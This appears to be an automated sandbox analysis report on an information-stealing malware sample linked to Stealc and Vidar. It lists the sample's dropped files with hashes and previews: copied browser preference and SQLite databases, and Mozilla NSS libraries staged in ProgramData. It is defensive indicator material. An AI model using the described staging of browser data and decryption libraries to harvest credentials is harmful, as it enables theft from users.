                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                M8PoiLFYWM.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse

                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                        C:\ProgramData\JJJJEBGDAFHJ\CFCFHJ

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                        Size (bytes):10237
                                                                                                                                                                                                        Entropy (8bit):5.498288591230544
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                                                                                                                                                        MD5:0F58C61DE9618A1B53735181E43EE166
                                                                                                                                                                                                        SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                                                                                                                                                        SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                                                                                                                                                        SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                        C:\ProgramData\JJJJEBGDAFHJ\CGDHIE

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):51200
                                                                                                                                                                                                        Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\ProgramData\JJJJEBGDAFHJ\DGDAEH

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                        Entropy (8bit):1.1239949490932863
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                                        MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                                        Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\ProgramData\JJJJEBGDAFHJ\DGDBFB

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\ProgramData\JJJJEBGDAFHJ\DHCBGD

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5242880
                                                                                                                                                                                                        Entropy (8bit):0.0357803477377646
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                                                        MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                                                        SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                                                        SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                                                        SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\ProgramData\JJJJEBGDAFHJ\DHCBGD-shm

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\ProgramData\JJJJEBGDAFHJ\ECBGCG

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\ProgramData\JJJJEBGDAFHJ\FBFIDB

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\ProgramData\JJJJEBGDAFHJ\FBFIDB-shm

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\ProgramData\JJJJEBGDAFHJ\GDBKJD

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                        Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\ProgramData\JJJJEBGDAFHJ\HDAFBA

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                        Entropy (8bit):0.8508558324143882
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                                        MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                                        SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                                        SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                                        SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\ProgramData\JJJJEBGDAFHJ\HIJJEG

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                                                        Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\ProgramData\JJJJEBGDAFHJ\IJDGII

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                        Entropy (8bit):1.136471148832945
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\ProgramData\freebl3.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):685392
                                                                                                                                                                                                        Entropy (8bit):6.872871740790978
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: M8PoiLFYWM.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\ProgramData\mozglue.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):608080
                                                                                                                                                                                                        Entropy (8bit):6.833616094889818
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):450024
                                                                                                                                                                                                        Entropy (8bit):6.673992339875127
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\ProgramData\nss3.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2046288
                                                                                                                                                                                                        Entropy (8bit):6.787733948558952
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\ProgramData\softokn3.dll

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):257872
                                                                                                                                                                                                        Entropy (8bit):6.727482641240852
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                        MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
